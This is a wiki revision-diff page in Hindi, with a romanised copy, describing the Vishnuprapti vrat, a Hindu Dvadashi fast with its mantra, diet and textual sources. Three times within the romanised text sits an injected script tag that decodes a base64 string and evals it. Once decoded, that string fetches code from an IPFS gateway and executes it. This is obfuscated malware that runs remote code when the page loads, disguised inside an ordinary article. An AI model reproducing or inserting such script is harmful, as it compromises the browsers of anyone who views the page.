Difference between revisions of "विष्णुप्राप्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[द्वादशी]] पर करना चाहिए।  
 
*यह व्रत [[द्वादशी]] पर करना चाहिए।  
 
*इसमें 'नमो नारायणाय' के साथ सूर्य को अर्ध्य, श्वेत [[भारत के पुष्प|पुष्पों]] एवं  
 
*इसमें 'नमो नारायणाय' के साथ सूर्य को अर्ध्य, श्वेत [[भारत के पुष्प|पुष्पों]] एवं  
Line 5: Line 5:
 
'''हे देवों में सर्वश्रेष्ठ, हे पृथ्वी के आश्रय, मेरे इन पुष्पों को कृपापूर्वक ग्रहण करके, हे भगवान [[विष्णु]] मुझ पर प्रसन्न हों'''  
 
'''हे देवों में सर्वश्रेष्ठ, हे पृथ्वी के आश्रय, मेरे इन पुष्पों को कृपापूर्वक ग्रहण करके, हे भगवान [[विष्णु]] मुझ पर प्रसन्न हों'''  
  
नामक मंत्र के साथ में विष्णु की पूजा करनी चाहिए। *व्यंजन, चावल या जौ या नीवार (जंगली चावल, तिन्नी आदि) के साथ श्यामक (सावाँ) या साठी <ref>(वह धान जो कि 60 दिनों में हो जाता है)</ref> पर निर्वाह करना करना चाहिए।
+
नामक मंत्र के साथ में विष्णु की पूजा करनी चाहिए। *व्यंजन, चावल या जौ या नीवार (जंगली चावल, तिन्नी आदि) के साथ श्यामक (सावाँ) या साठी <ref>वह धान जो कि 60 दिनों में हो जाता है</ref> पर निर्वाह करना करना चाहिए।
 
*इसके उपरान्त पारण, [[विष्णु लोक]] की प्राप्ति होती है।<ref> कृत्यकल्पतरु (व्रतखण्ड, 343-344); हेमाद्रि (व्रतखण्ड 1, 1203-1204, [[भविष्यपुराण]] से उद्धरण)।</ref>
 
*इसके उपरान्त पारण, [[विष्णु लोक]] की प्राप्ति होती है।<ref> कृत्यकल्पतरु (व्रतखण्ड, 343-344); हेमाद्रि (व्रतखण्ड 1, 1203-1204, [[भविष्यपुराण]] से उद्धरण)।</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:55, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat dvadashi par karana chahie.
  • isamean 'namo narayanay' ke sath soory ko ardhy, shvet pushpoan evan

he devoan mean sarvashreshth, he prithvi ke ashray, mere in pushpoan ko kripapoorvak grahan karake, he bhagavan vishnu mujh par prasann hoan

namak mantr ke sath mean vishnu ki pooja karani chahie. *vyanjan, chaval ya jau ya nivar (jangali chaval, tinni adi) ke sath shyamak (savaan) ya sathi [1] par nirvah karana karana chahie.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. vah dhan jo ki 60 dinoan mean ho jata hai
  2. krityakalpataru (vratakhand, 343-344); hemadri (vratakhand 1, 1203-1204, bhavishyapuran se uddharan).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>